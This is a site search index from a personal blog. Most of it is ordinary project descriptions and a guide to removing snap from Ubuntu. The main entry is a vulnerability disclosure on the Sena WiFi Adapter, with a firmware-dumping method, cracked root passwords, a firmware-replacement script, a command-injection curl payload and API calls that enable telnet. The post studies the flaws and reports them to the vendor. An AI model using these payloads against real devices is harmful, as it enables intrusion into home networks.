The application reads real-time data including voltage, current, power, energy, capacity, resistance, and temperature from compatible Atorch USB power meters.\u003c/p\u003e\n\u003cp\u003eThe web interface provides data logging capabilities with the ability to reset, pause, and save measurement sessions. Using WebBluetooth API, the application eliminates the need for additional software installations, operating directly in compatible web browsers with Bluetooth support.\u003c/p\u003e","title":"USB Meter"},{"content":"An opkg repository that builds Tailscale combined packages for OpenWrt devices, specifically providing a backport of Tailscale for OpenWrt 19.07. The project addresses the lack of official Tailscale packages for older OpenWrt versions by providing a flexible build system that generates installable packages across multiple hardware architectures.\nThe repository includes automated build scripts that create opkg feed and package files, allowing users to easily install and configure Tailscale on their OpenWrt 19.07 devices. This enables secure mesh networking capabilities on legacy router firmware, making it simple to connect older OpenWrt devices to a Tailscale network for remote access and site-to-site connectivity.\n","permalink":"https://lanrat.com/projects/openwrt-tailscale-repository/","summary":"\u003cp\u003eAn opkg repository that builds Tailscale combined packages for OpenWrt devices, specifically providing a backport of Tailscale for OpenWrt 19.07. The project addresses the lack of official Tailscale packages for older OpenWrt versions by providing a flexible build system that generates installable packages across multiple hardware architectures.\u003c/p\u003e\n\u003cp\u003eThe repository includes automated build scripts that create opkg feed and package files, allowing users to easily install and configure Tailscale on their OpenWrt 19.07 devices. 
This enables secure mesh networking capabilities on legacy router firmware, making it simple to connect older OpenWrt devices to a Tailscale network for remote access and site-to-site connectivity.\u003c/p\u003e","title":"OpenWrt Tailscale Repository"},{"content":"Mag Encode is a web-based magnetic stripe card encoder that generates audio signals for encoding data onto magnetic stripe cards. The application runs entirely in the browser, processing encoding operations client-side without transmitting data to external servers.\nThe tool supports configurable encoding parameters including frequency settings, reverse swipe options, and various advanced configuration options for different magnetic stripe formats. It converts digital data into the appropriate audio waveforms that can be played through audio output devices to magnetically encode stripe cards.\n","permalink":"https://lanrat.com/projects/mag-encode/","summary":"\u003cp\u003eMag Encode is a web-based magnetic stripe card encoder that generates audio signals for encoding data onto magnetic stripe cards. The application runs entirely in the browser, processing encoding operations client-side without transmitting data to external servers.\u003c/p\u003e\n\u003cp\u003eThe tool supports configurable encoding parameters including frequency settings, reverse swipe options, and various advanced configuration options for different magnetic stripe formats. It converts digital data into the appropriate audio waveforms that can be played through audio output devices to magnetically encode stripe cards.\u003c/p\u003e","title":"Mag Encode"},{"content":"Broken DNS performs lame delegation checking at scale to identify DNS nameserver configuration issues. 
The tool validates DNS delegation by checking if nameservers properly respond to queries for zones they are supposed to be authoritative for.\nThe Go implementation can process large numbers of domains and nameservers to detect misconfigurations where nameservers are listed in delegation records but do not actually serve the zone data. This helps identify broken DNS setups that can cause resolution failures.\n","permalink":"https://lanrat.com/projects/broken-dns/","summary":"\u003cp\u003eBroken DNS performs lame delegation checking at scale to identify DNS nameserver configuration issues. The tool validates DNS delegation by checking if nameservers properly respond to queries for zones they are supposed to be authoritative for.\u003c/p\u003e\n\u003cp\u003eThe Go implementation can process large numbers of domains and nameservers to detect misconfigurations where nameservers are listed in delegation records but do not actually serve the zone data. This helps identify broken DNS setups that can cause resolution failures.\u003c/p\u003e","title":"Broken DNS"},{"content":"Minimalin Reborn is a minimalistic watchface for Pebble smartwatches, featuring a clean design with customizable colors and optional information displays. The watchface uses a custom font called Nupe and provides configurable elements including weather data and step tracking integration.\nThis project is a fork and modernization of the original minimalin watchface, updated to work with current Pebble development tools and the Rebble ecosystem. The watchface supports both color and monochrome Pebble devices with adaptive styling and user-configurable display options.\n","permalink":"https://lanrat.com/projects/minimalin-reborn/","summary":"\u003cp\u003eMinimalin Reborn is a minimalistic watchface for Pebble smartwatches, featuring a clean design with customizable colors and optional information displays. 
The watchface uses a custom font called Nupe and provides configurable elements including weather data and step tracking integration.\u003c/p\u003e\n\u003cp\u003eThis project is a fork and modernization of the original minimalin watchface, updated to work with current Pebble development tools and the Rebble ecosystem. The watchface supports both color and monochrome Pebble devices with adaptive styling and user-configurable display options.\u003c/p\u003e","title":"Minimalin Reborn"},{"content":"Recent versions of Ubuntu are shipping with Snapcraft by default, and some of the default applications run inside a snap as well. Snaps are application containers, similar to Docker, but designed for desktop applications.\nUnfortunately Canonical seems to be pushing Snaps hard, and they are not always wanted. This is made worse by not providing an easy way to remove the snap functionality for Ubuntu.\nThe commands below will entirely remove snap from an Ubuntu installation.\nsudo snap remove snap-store sudo apt remove snapd sudo umount /dev/loop* sudo rm -rf /snap sudo rm -rf /var/snap sudo rm -rf /var/lib/snapd sudo rm -rf /etc/systemd/system/snap* sudo rm -rf /root/snap/ /home/*/snap sudo apt purge snapd echo -e \u0026#39;Package: snapd\\nPin: origin *\\nPin-Priority: -1\u0026#39; | sudo tee /etc/apt/preferences.d/no_snapd reboot Note By default Firefox is installed as a snap and will be removed with the above commands. 
So if you want to keep Firefox installed (or any other snap program you had previously installed) you will need to re-install it using apt.\nsudo apt install firefox The above commands have been successfully tested and work on Ubuntu 20.04 and 22.04.\n","permalink":"https://lanrat.com/posts/remove-snap-from-ubuntu/","summary":"\u003cp\u003eRecent versions of \u003ca href=\"https://ubuntu.com/\"\u003eUbuntu\u003c/a\u003e are shipping with \u003ca href=\"https://snapcraft.io/\"\u003eSnapcraft\u003c/a\u003e by default, and some of the default applications run inside a snap as well. Snaps are application containers, similar to Docker, but designed for desktop applications.\u003c/p\u003e\n\u003cp\u003eUnfortunately Canonical seems to be pushing Snaps hard, and they are not always wanted. This is made worse by not providing an easy way to remove the snap functionality for Ubuntu.\u003c/p\u003e\n\u003cp\u003eThe commands below will entirely remove snap from an Ubuntu installation.\u003c/p\u003e","title":"Remove SNAP from Ubuntu"},{"content":"Homeplate is an ESP32-based e-ink dashboard that displays data from Trmnl and Home Assistant on an Inkplate 10 device. The firmware fetches and renders various dashboard widgets including sensor readings, WiFi QR codes, and system status information.\nThe implementation uses FreeRTOS on ESP32 to manage display updates, network connectivity, and power management for the e-ink display. It supports multiple data sources and configurable display layouts for home automation monitoring.\n","permalink":"https://lanrat.com/projects/homeplate/","summary":"\u003cp\u003eHomeplate is an ESP32-based e-ink dashboard that displays data from Trmnl and Home Assistant on an Inkplate 10 device. 
The firmware fetches and renders various dashboard widgets including sensor readings, WiFi QR codes, and system status information.\u003c/p\u003e\n\u003cp\u003eThe implementation uses FreeRTOS on ESP32 to manage display updates, network connectivity, and power management for the e-ink display. It supports multiple data sources and configurable display layouts for home automation monitoring.\u003c/p\u003e","title":"Homeplate"},{"content":"ESPHome Components is a collection of custom components that extend ESPHome functionality for ESP8266 and ESP32 microcontrollers. The repository contains C++ implementations of additional sensors, displays, and device integrations not available in the core ESPHome distribution.\nThe components follow ESPHome\u0026rsquo;s standard architecture and configuration patterns, allowing them to be easily integrated into existing ESPHome projects through external component references. Each component includes the necessary C++ code and Python configuration validation.\n","permalink":"https://lanrat.com/projects/esphome-components/","summary":"\u003cp\u003eESPHome Components is a collection of custom components that extend ESPHome functionality for ESP8266 and ESP32 microcontrollers. The repository contains C++ implementations of additional sensors, displays, and device integrations not available in the core ESPHome distribution.\u003c/p\u003e\n\u003cp\u003eThe components follow ESPHome\u0026rsquo;s standard architecture and configuration patterns, allowing them to be easily integrated into existing ESPHome projects through external component references. Each component includes the necessary C++ code and Python configuration validation.\u003c/p\u003e","title":"ESPHome Components"},{"content":"DNS2mDNS bridges traditional DNS queries with multicast DNS (mDNS) resolution for .local hostnames. 
The service allows devices that don\u0026rsquo;t natively support mDNS, such as many Android devices and Windows systems, to resolve local network hostnames through standard DNS queries.\nThe Go implementation acts as a DNS server that intercepts queries for .local domains and forwards them to the mDNS system, then returns the results via standard DNS responses. This enables seamless local hostname resolution across mixed network environments with Docker deployment support.\n","permalink":"https://lanrat.com/projects/dns2mdns/","summary":"\u003cp\u003eDNS2mDNS bridges traditional DNS queries with multicast DNS (mDNS) resolution for .local hostnames. The service allows devices that don\u0026rsquo;t natively support mDNS, such as many Android devices and Windows systems, to resolve local network hostnames through standard DNS queries.\u003c/p\u003e\n\u003cp\u003eThe Go implementation acts as a DNS server that intercepts queries for .local domains and forwards them to the mDNS system, then returns the results via standard DNS responses. This enables seamless local hostname resolution across mixed network environments with Docker deployment support.\u003c/p\u003e","title":"DNS2mDNS"},{"content":"This post outlines a security assessment of the new Sena Wifi Adapter I performed last summer for fun.\nWith the world on lock-down due to COVID-19, I spent a lot of time last summer escaping the city going on motorcycle rides through the mountains and forests surrounding the bay area. It\u0026rsquo;s the perfect social distance activity because if you get within 6ft of someone you are likely to crash. One of my favorite motorcycle accessories is my Sena headset. It allows me to listen to navigation or music from my phone over Bluetooth while riding, and talk to other riders in my group.\nI was in the market for a new headset and Sena had just released the Sena 50R. It has USB-C, mesh, Bluetooth 5, voice activated assistant, and a built in FM radio. 
A huge upgrade from my older SMH10R.\nThe 50R is meant to be controlled via a companion app that allows the user to change the settings. The USB-C port is used for charging and firmware updates. The 50R comes with a WiFi Adapter cable to simultaneously charge the headset and install any available firmware updates.\nSena WiFi Adapter Cable\nThis WiFi Adapter cable is actually a USB-C cable with a WiFi-enabled computer inside the cable. This sounds a lot like the COTTONMOUTH implant from the NSA ANT catalog, but much cheaper.\nTo use the WiFi cable, after plugging it in and waiting for it to boot, it creates its own WiFi access point, which the app connects to, allowing the user to configure the cable to connect to their home\u0026rsquo;s WiFi network. Now every time a headset is plugged into the USB-C end of the cable, it will check for firmware updates and install them.\nSena must really want everyone to have up-to-date firmware to build a WiFi-enabled firmware-updating computer inside of a USB cable.\nSecurity Assessment Being the curious security-minded person that I am, I decided to investigate this computer inside my new USB cable.\nPhysical Assessment Removing 4 screws and disconnecting the USB upstream and downstream cables is all it takes to see the internal components.\nThe main SOC (System On Chip) is a SONiX SN98600 containing an ARM9 CPU and 64MB of RAM. There is a 16MB Winbond 25Q128JVP0 SPI flash storage chip, and a Realtek RTL8188EU WiFi interface.\nThere are some test points, three of which are conveniently labeled GND, TX, and RX, which looks a lot like UART! Connecting these test points to a logic analyzer and monitoring the signals while applying power confirms that it is an async serial port configured for 115200 8N1.\nMonitoring the UART while rebooting reveals that the device is using the U-BOOT boot loader to boot Linux kernel 2.6.35.12. 
While the Linux kernel boots, the boot logs provide more details on the hardware and its configuration, and then the device drops to a login prompt.\nDumping the Flash In order to dump the contents of the SPI flash chip to better examine the system\u0026rsquo;s file-system there are two options.\nConnect the SPI flash chip to a device that speaks SPI, like the FT232H, and use the flashrom tool to dump the contents. Find a way to read and dump the flash contents from within the device. The first option is cleaner and is my preferred method. I connected GND, MISO, MOSI, CS, CLK, and 3.3 VCC to my SPI dumper and tried to identify the chip with flashrom -p ft2232_spi:type=232h --flash-name. However providing power to the SPI chip also supplied power to the main SOC and other components on the board, causing them to boot and also send commands to the SPI flash, making a clean read impossible. I could have desoldered the chip and read it without powering the rest of the device, but that runs the risk that I might physically damage something in the process, so I decided to give the second option a try.\nI did not know any valid logins to get past the Linux login prompt (I tried a lot of the common defaults), but what about the boot loader? The U-BOOT boot loader was configured to immediately start the Linux kernel after loading. My colleague Matthew Garrett proposed an ingenious idea: glitch U-BOOT into dropping to a shell. The idea is that after U-BOOT itself loads, it loads the Linux kernel from the SPI flash into RAM, and then boots it. If this process can be tricked into erroring, then it may drop to an interactive U-BOOT shell. This can be accomplished by interfering with the SPI MISO signal while U-BOOT is loading the kernel so that it loads a corrupt kernel and is unable to boot it. I did this by watching the console output and shorting the SPI MISO to ground very briefly while it was loading the kernel image. 
This took a few tries to get right, but it did result in U-BOOT entering an interactive shell.\nU-BOOT can be compiled to include different utilities or commands to get the system booting. This version included the following two commands of interest:\nspi read addr offset len - read \u0026#39;len\u0026#39; bytes starting at \u0026#39;offset\u0026#39; to memory at \u0026#39;addr\u0026#39; md [.b, .w, .l] address [# of objects] spi read reads data from the SPI chip into memory at a specified location. md displays the contents of memory at the provided location in a hexdump-like format. I could tell from the boot logs that the Linux kernel is loaded into memory starting at address 0x00008000, so that address should be safe to load flash data to, and the entire flash is 16M, which is 0x1000000 bytes in hex.\nUsing these two commands, it is possible to load all of the flash to memory and then dump it over the UART. I used screen -L as the serial console so that all of the UART results would be saved to a file.\nscreen -L /dev/ttyUSB0 115200 spi read 0x00008000 0 0x1000000 md 0x00008000 1000000 slowly dumping the SPI flash over UART\nThe spi read operation took about one second to complete; however, due to the inefficiency of loading 16M of data in hexdump format over a 115200 baud connection, the md operation took the better part of a day. Reading the SPI chip directly would have been much faster, but I did not want to risk it.\nOnce the dump finishes, xxd can be used to convert it from the hexdump format to binary.\nxxd -r hexdump.txt flash.bin Since the md command started at offset 0x8000, xxd will prepend nulls (0x00) to the file to make the offsets align. dd can be used to trim the extra data added for the memory offsets, leaving just the flash data with the correct offsets.\ndd if=flash.bin of=flash_trim.bin bs=1 skip=$((0x8000)) Since the flash was dumped from RAM, it needs to be converted from big-endian to little-endian. 
This can be done with objcopy.\nobjcopy -I binary -O binary --reverse-bytes=4 flash_trim.bin sena_wifi.bin The boot logs contain the partition table, which can be used to extract the individual partitions on the flash.\nhw-setting=0x00000000 0x00000FFF u-boot=0x00003000 0x0007DFFF u-env=0x0007E000 0x0007E000 flash-layout=0x0007F000 0x0007FFFF factory=0x00080000 0x000BFFFF kernel=0x000C0000 0x003BFFFF rootfs-r=0x003C0000 0x00ABFFFF rootfs-app=0x00ABFFFF 0x00ABFFFF rootfs-rw =0x00EC0000 0x00FBFFFF user=0x00FC0000 0x00FFFFFF u-logo=0x00FFFFFF 0x00FFFFFF rescue=0x00AC0000 0x00EBFFFF dd if=sena_wifi.bin of=hw_setting.bin bs=1 skip=$((0x00000000)) count=$((0x00000FFF-0x00000000)) dd if=sena_wifi.bin of=u-boot.bin bs=1 skip=$((0x00003000)) count=$((0x0007DFFF-0x00003000)) dd if=sena_wifi.bin of=u-env.bin bs=1 skip=$((0x0007E000)) count=$((0x0007E000-0x0007E000)) dd if=sena_wifi.bin of=flash-layout.bin bs=1 skip=$((0x0007F000)) count=$((0x0007FFFF-0x0007F000)) dd if=sena_wifi.bin of=factory.bin bs=1 skip=$((0x00080000)) count=$((0x000BFFFF-0x00080000)) dd if=sena_wifi.bin of=kernel.bin bs=1 skip=$((0x000C0000)) count=$((0x003BFFFF-0x000C0000)) dd if=sena_wifi.bin of=rootfs-r.bin bs=1 skip=$((0x003C0000)) count=$((0x00ABFFFF-0x003C0000)) dd if=sena_wifi.bin of=rootfs-app.bin bs=1 skip=$((0x00ABFFFF)) count=$((0x00ABFFFF-0x00ABFFFF)) dd if=sena_wifi.bin of=rootfs-rw.bin bs=1 skip=$((0x00EC0000)) count=$((0x00FBFFFF-0x00EC0000)) dd if=sena_wifi.bin of=user.bin bs=1 skip=$((0x00FC0000)) count=$((0x00FFFFFF-0x00FC0000)) dd if=sena_wifi.bin of=u-logo.bin bs=1 skip=$((0x00FFFFFF)) count=$((0x00FFFFFF-0x00FFFFFF)) dd if=sena_wifi.bin of=rescue.bin bs=1 skip=$((0x00AC0000)) count=$((0x00EBFFFF-0x00AC0000)) With the individual partitions extracted they can be explored with tools like file, strings, Binwalk, or mounted on another Linux system. 
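The objcopy byte swap and dd partition carving above can also be sketched in Python. This is an illustrative sketch, not a tool used in the post: the function names `reverse_words` and `carve` are made up, and the `PARTITIONS` offsets are copied from the boot-log partition table shown above.

```python
# Sketch: the objcopy --reverse-bytes=4 swap and the dd carving,
# expressed in Python. Names and structure are illustrative.

def reverse_words(data: bytes, word: int = 4) -> bytes:
    """Swap the byte order of each 4-byte word (objcopy --reverse-bytes=4)."""
    out = bytearray()
    for i in range(0, len(data), word):
        out += data[i:i + word][::-1]
    return bytes(out)

# (start, end) offsets copied from the boot-log partition table above.
PARTITIONS = {
    "kernel": (0x000C0000, 0x003BFFFF),
    "rootfs-r": (0x003C0000, 0x00ABFFFF),
    "rootfs-rw": (0x00EC0000, 0x00FBFFFF),
}

def carve(flash: bytes, start: int, end: int) -> bytes:
    """Equivalent of dd bs=1 skip=start count=end-start."""
    return flash[start:end]
```

Like the dd commands above, the slice uses `end - start` bytes, which is end-exclusive; if the boot log's end offsets are inclusive (they end in 0xFFFF), an exact carve would take `end - start + 1` bytes, a one-byte difference that rarely matters for exploration.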
The rootfs-r and rootfs-rw seem to be the only partitions with real file-systems and can be mounted locally with the following commands.\nmount -t cramfs -o loop,ro rootfs-r.bin rootfs-r/ modprobe mtdblock dd if=rootfs-rw.bin of=/dev/mtdblock0 mount -t jffs2 -o ro /dev/mtdblock0 rootfs-rw/ Now the file-systems can be explored locally.\nPasswords There are two /etc/shadow files, one on rootfs-r and another on rootfs-rw. One is mounted over the other during boot. The root password from rootfs-r was hashed with md5crypt, which the online service OnlineHashCrack.com was able to crack for free, revealing it was 1234. However this password did not work for the UART Linux login prompt, meaning the rootfs-rw partition is likely mounted over it.\nThe rootfs-rw partition\u0026rsquo;s /etc/shadow root password was hashed with the older DEScrypt algorithm. I was able to submit this hash to crack.sh and have it cracked in a day, revealing the password snowtalk. They say a picture is worth 1000 words:\nRoot shell on Sena WiFi Adapter\nIt worked! Root shell acquired! It\u0026rsquo;s now possible to poke around the running system, which is much more valuable than just exploring the file-system dump created earlier.\nSena has another product called the Snowtalk, which makes me wonder if, aside from poor password choice, there is any password reuse going on\u0026hellip;\nNetwork Analysis The Sena WiFi adapter can act as its own AP (wireless access point) for initial configuration, or join an existing wireless network (for updating firmware). In both modes the same services appear to be running on the device. 
The only service of interest is an HTTP server running on port 8000, which the companion app sends requests to; more on that later.\nWhen in normal mode (as a client connected to WiFi), the WiFi adapter sends out periodic requests to check for firmware updates for itself, and any headset that may be connected.\nIn order to view and tamper with the outbound requests, I made a simple DNS and HTTP MITM server that would log and respond to any requests the device made on the network. Using this tool I was able to discover that all of its outbound requests are to http://firmware.sena.com. This is interesting because it only used HTTP and not HTTPS, which means the traffic can be easily inspected and it is possible to serve different content to the adapter without it knowing.\nNetwork Behavior First, periodic requests are made to http://firmware.sena.com/senabluetoothmanager/WiFiCradle/check.cdat to check for Internet connectivity. Once Internet connectivity is established, a request to http://firmware.sena.com/senabluetoothmanager/WiFiCradle/fw_restore_ver_adapter.cdat is made to determine if the WiFi adapter needs to update its own firmware; if so, it will download an ARM ELF executable from the same server and run it. If there is a newer adapter firmware available, it will download the binary http://firmware.sena.com/senabluetoothmanager/WiFiCradle/FIRMWARE_660R_X.X_ADAPTER.bin and run it, where X.X is the firmware version.\nAfter the WiFi adapter is satisfied that it is running the latest firmware, it will make a request to http://firmware.sena.com/senabluetoothmanager/Firmware to get a list of all the firmware available for all of Sena\u0026rsquo;s headset products. If it determines that there is a newer firmware available for the connected headset, it will download and run http://firmware.sena.com/senabluetoothmanager/WiFiCradle/loader.capp, which is another ARM ELF executable to start the firmware updating process. 
This loader.capp will determine which headset is connected by looking at the USB Product ID (PID), and then download http://firmware.sena.com/senabluetoothmanager/WiFiCradle/updater_0x####.capp, where 0x#### is the USB PID in hex. This is another binary file that is run, specific to the particular headset that is connected. For my 50R, this was updater_0x3134.capp. Finally, the updater program will download the latest firmware image and flash it to the headset using DFU. In my case this was http://firmware.sena.com/senabluetoothmanager/50R-v1.0.4.img.\nNetwork MITM What\u0026rsquo;s important to note here is that all the binaries are downloaded over HTTP, and there is no signature validation. This means anyone able to intercept network requests can provide other binaries and the WiFi adapter will blindly download and run them. To test this I created my own version of the binaries using the following shell script:\n#!/bin/sh ping -c 1 hacked.com Surprisingly this worked even though it was a script and not an ELF binary. As I was still monitoring the network traffic, I could see the DNS request being made for hacked.com and then ICMP requests being sent to it. This worked for all of the previously mentioned binary files. This allows for Remote Code Execution as long as the attacker is on the same network as the adapter and able to impersonate the firmware.sena.com HTTP server. Combined with ARP Spoofing, an attacker only needs to be on the same network to make the adapter think that the attacker is the gateway, allowing them to impersonate the HTTP update server and send malicious updates.\nBut can the attack be better?\nReverse Engineering With access to the file-system and binaries that are running on the device from the prior work, it is now possible to examine the HTTP API server query.cgi listening on port 8000. 
This API is used by the companion apps.\nSince the query.cgi HTTP server runs when the adapter is in AP mode, and when connected to another network, it is possible to make calls to it from any computer on the same network it is connected to, and even instruct it to switch into AP mode, or out of AP mode to connect to another network, just as the Android app does. There is no authentication for the API, or for the network when in AP mode, making the API a great target.\nMonitoring the network traffic between the Android app and the WiFi adapter (IP:10.42.0.1) reveals that all the API calls are HTTP GET requests with parameters and values in the query-string, and responses returned in the HTTP body.\nhttp://10.42.0.1:8000/cgi-bin/query.cgi?cmd=getaplist http://10.42.0.1:8000/cgi-bin/query.cgi?cmd=app_version http://10.42.0.1:8000/cgi-bin/query.cgi?cmd=setssid\u0026amp;value=WiFiNetworkName http://10.42.0.1:8000/cgi-bin/query.cgi?cmd=getlog This appears to be a very simple RPC API where the cmd parameter is the function to call and any arguments are provided with the value parameters.\nSome API calls reveal a lot of information. For example, one such call returns the user\u0026rsquo;s WiFi password, which could be used by an attacker to get onto a victim\u0026rsquo;s home network if they de-auth the WiFi adapter, putting it into AP mode first.\nIn order to determine how the API calls are implemented and if there are any other hidden API calls available, the query.cgi can be examined with a software reverse engineering tool like Ghidra.\nTaking a look at setssid I looked at the setssid command first to see how the user-supplied data was being processed. 
After setting the WiFi SSID in the [wpa_supplicant.conf](https://linux.die.net/man/5/wpa_supplicant.conf) file it also sets the hostname of the WiFi adapter to the provided value with the following code:\nsetssid() function\nAt first pass this may seem fine, but upon further inspection I noticed that the user-supplied value, param_1 in this case, was being put into a string with sprintf() and then passed to system(), which will pass the command to the shell. This is a vulnerability.\nIf I pass the value sena1337\u0026quot;;ping -c1 \u0026quot;hacked.com, then the string passed to system() will end up being /bin/hostname \u0026quot;sena1337\u0026quot;;ping -c1 \u0026quot;hacked.com\u0026quot; which will set the hostname to \u0026ldquo;sena1337\u0026rdquo; and then run the second command provided, in this case, ping. This works because the ; character tells the shell to treat everything after it as a separate command.\nSince setting the SSID is a feature provided by the mobile app, it might be possible to use it to run commands; however, it seems Sena thought of that and prevented it.\nSena Android App command injection\nBut this is only the Android app sanitizing the input and preventing the use of special characters in this API call. It is possible to bypass the app and make the call directly with curl, URL-encoding the parameters:\ncurl \u0026#39;http://10.42.0.1:8000/cgi-bin/query.cgi?cmd=setssid\u0026amp;value=sena1337%22%3Bping%20-c1%20%22hacked.com\u0026#39; After running the above command while the adapter was on my home network, I observed both a DNS query for hacked.com and ICMP ping requests being sent. This is known as Command Injection, and it worked here because the user input was only validated on the client (Android app) and not the server (HTTP API). While the ping here is harmless, it can be replaced with any other command, which the WiFi adapter will run as root.
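To make the bug and its fix concrete, here is a small sketch with Python standing in for the C code; the real binary uses sprintf() and system(), and the function names here are invented for illustration:

```python
import shlex

def build_hostname_cmd_unsafe(ssid):
    # Mirrors the vulnerable pattern: the untrusted value is pasted
    # straight into a shell command string.
    return '/bin/hostname "%s"' % ssid

def build_hostname_cmd_safe(ssid):
    # A server-side fix: shell-quote the untrusted value instead of
    # trusting the client app to filter special characters.
    return "/bin/hostname %s" % shlex.quote(ssid)

payload = 'sena1337";ping -c1 "hacked.com'
print(build_hostname_cmd_unsafe(payload))  # quotes break out; two shell commands
print(build_hostname_cmd_safe(payload))    # one quoted argument; no injection
```

The safe variant keeps the entire payload as a single argument to /bin/hostname, so the embedded ; never reaches the shell as a command separator.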
Another RCE!\nFinding a Backdoor After further examination of the HTTP API code I found a few more interesting API calls. The WiFi adapter has two test modes that change the endpoints the adapter uses to check for firmware updates. These are likely used internally at Sena for development and debugging. When in test mode the WiFi adapter also starts a telnet server listening on port 23. And of course, there is an API call to just enable the telnet server directly in the normal mode too. An HTTP GET request to any of these endpoints will start the telnet server:\nhttp://10.42.0.1:8000/cgi-bin/query.cgi?cmd=telnetd http://10.42.0.1:8000/cgi-bin/query.cgi?cmd=setconf\u0026amp;key=testmode\u0026amp;value=1 http://10.42.0.1:8000/cgi-bin/query.cgi?cmd=setconf\u0026amp;key=testmode\u0026amp;value=2 Once started, anyone on the same network can connect to it. The telnet server does require authentication, but the previously acquired password works, providing another root shell. More RCE!\nLooking at Another System Call There are many places where the HTTP API will make a system() call to wget in order to download a file from the Internet, such as the previously mentioned firmware updates or binaries that it runs as part of the update process. All of the calls to wget look like this:\nwget system() call\nHere the code clearly shows us that wget is always called with the --no-check-certificate flag, which means that even if HTTPS were used, the certificate would not be checked, still allowing an attacker to provide any binary or firmware they want.\nAfter reviewing more of the code, I suspect that the same code and hardware that are in this WiFi adapter are also in Sena\u0026rsquo;s WiFi Docking Station, implying it is vulnerable to the same attacks. There were even references to unreleased and unannounced Sena products in the reverse-engineered code as well.\nConclusion These findings provide a potential attacker multiple ways to remotely get root shell access to the WiFi Adapter cable.
From here they can flash malicious firmware to the adapter and helmet, or use the adapter as a pivot point and attack other devices on the user\u0026rsquo;s home network. If the attacker were able to flash malicious firmware onto a headset, it could lead to injury or even loss of life if the bad firmware were able to distract or incapacitate a driver.\nUnfortunately these types of vulnerabilities are common on IoT devices like this, where security is not a high priority.\nFindings List weak dictionary word password no signature verification for update images or binaries loaded over the network no TLS used for remote connections command injection on HTTP API SSL certificate checking disabled telnet backdoor One hypothetical full attack chain could go like this: an attacker scans for Sena WiFi adapters around them, identifying them by MAC address OUI prefix. Once found, the attacker sends a WiFi de-auth frame to the adapter, causing it to go into AP mode if it is not in it already. They then connect to the WiFi adapter and get a root shell using either the telnet backdoor and password, or command injection. From here the attacker can steal the user\u0026rsquo;s home WiFi password, use the adapter as a pivot to attack other devices on the victim\u0026rsquo;s network, backdoor the firmware to provide malicious firmware updates to any connected headsets, and more. All wirelessly, without physical access to the WiFi adapter.\nDisclosure Timeline As a long-time user and advocate of Sena products, I\u0026rsquo;d like to work with them to fix these issues and make them more secure for everyone. Unfortunately that was more difficult than ideal. I was unable to get in contact with anyone at Sena to disclose the vulnerabilities when I initially found them in September 2020. It was not until after I gave them 90 days and submitted my original draft of this post to them in December that they eventually responded to me and started working to fix the issues.
I gave them an additional few months to fix the issues as it was my goal to get the problems fixed.\n09/24/2020 - I had great difficulty finding any contact information for Sena to report these findings. I started by emailing sales.us@sena.com and sena.it@sena.com, and was told to file a support ticket. 09/25/2020 - Sent a Twitter DM to @senabluetooth, who also told me to file a support ticket. I filed support ticket #390170 to start the conversation for disclosure. The support reps said they would pass along my claim to upper management and then closed the ticket. However, I was unable to provide details of the vulnerabilities to them. 09/26/2020 - I emailed security@sena.com (bounced), privacy@sena.com, info@sena.com, and it@senausa.com, but got no responses. I even found what I believed to be their CIO\u0026rsquo;s email and emailed them directly and got no response. Still, I decided to give them 90 days before publishing this post in case they were working internally on a fix. 12/23/2020 - I sent a draft of this post to the Sena support team and CIO. 12/24/2020 - Sena\u0026rsquo;s CIO finally responds to my email and forwards the information to the product team. 12/25/2020 - Sena\u0026rsquo;s CTO reaches out to me to let me know their development team is investigating the issues. 12/29/2020 - Sena confirms everything in the above report to be correct, and asks that I postpone publishing until the end of February 2021. I agree. 02/26/2021 - Sena releases WiFi Adapter firmware v1.1 and updates to their mobile apps with fixes to the findings above. 03/08/2021 - I publish this blog post. Note I have not gotten around to testing the Sena updates to verify that all of the issues described here are sufficiently mitigated.
I\u0026rsquo;ll update this post if I get around to testing them.\nSena was nice enough to send me a free Sena 50R for submitting the issue to them and for waiting for them to release a fix before publishing this post.\n","permalink":"https://lanrat.com/posts/sena-wifi-adapter-security/","summary":"\u003cp\u003eThis post outlines a security assessment of the new Sena Wifi Adapter I performed last summer for fun.\u003c/p\u003e\n\u003cp\u003eWith the world on lock-down due to COVID-19, I spent a lot of time last summer escaping the city going on motorcycle rides through the mountains and forests surrounding the bay area. It\u0026rsquo;s the perfect social distance activity because if you get within 6ft of someone you are likely to crash. One of my favorite motorcycle accessories is my Sena headset. It allows me to listen to navigation or music from my phone over Bluetooth while riding, and talk to other riders in my group.\u003c/p\u003e","title":"Sena WiFi Adapter Security Assessment \u0026 Vulnerabilities"},{"content":"Luxer One is a Python API client for the Luxer One Residential package management system. The library provides programmatic access to check package delivery status, retrieve pending packages, and interact with smart locker systems commonly found in apartment complexes and residential buildings.\nThe client handles authentication with the Luxer One API and includes example code demonstrating basic operations such as logging in and querying package information. This enables automated monitoring and management of package deliveries through the Luxer One platform.\n","permalink":"https://lanrat.com/projects/luxer-one/","summary":"\u003cp\u003eLuxer One is a Python API client for the Luxer One Residential package management system. 
The library provides programmatic access to check package delivery status, retrieve pending packages, and interact with smart locker systems commonly found in apartment complexes and residential buildings.\u003c/p\u003e\n\u003cp\u003eThe client handles authentication with the Luxer One API and includes example code demonstrating basic operations such as logging in and querying package information. This enables automated monitoring and management of package deliveries through the Luxer One platform.\u003c/p\u003e","title":"Luxer One"},{"content":"A while ago I received a bunch of bare ESP-WROOM-02 chips on tape, but I could not find enough documentation to program them (partially out of laziness). With my recent interest in ESPHome, I decided to give them another try. This blog post contains the results of my research on how to program them.\nESP-WROOM-02\nThe ESP-WROOM-02 is just an ESP8266 underneath. If you don\u0026rsquo;t have a breakout board like me, then you will need a UART adapter and to make a few minimal solder connections to set the various boot modes to allow you to program the firmware. Once programmed for the first time, you can use OTA updates to allow flashing firmware over WiFi and not need to mess with the wiring every time you want to reprogram it.\nThe pinout of the ESP-WROOM-02 from its datasheet is as follows:\nESP-WROOM-02 pinout\nPowering the ESP-WROOM-02 At a minimum, to power the chip, you\u0026rsquo;ll need to provide 3.3v to pin 1, and ground to pin 9 or pin 18. You\u0026rsquo;ll also need to pull the EN pin high to enable the chip. The correct way to do this is to use a 10k resistor between pin 2 and your 3.3v power source, but I just bridged pin 1 and pin 2 so that the ESP is always enabled when receiving power. This is a hack, but good enough for my purposes.\nWhen the RST pin 15 goes from low (GND) to high or floating it will reset the ESP.
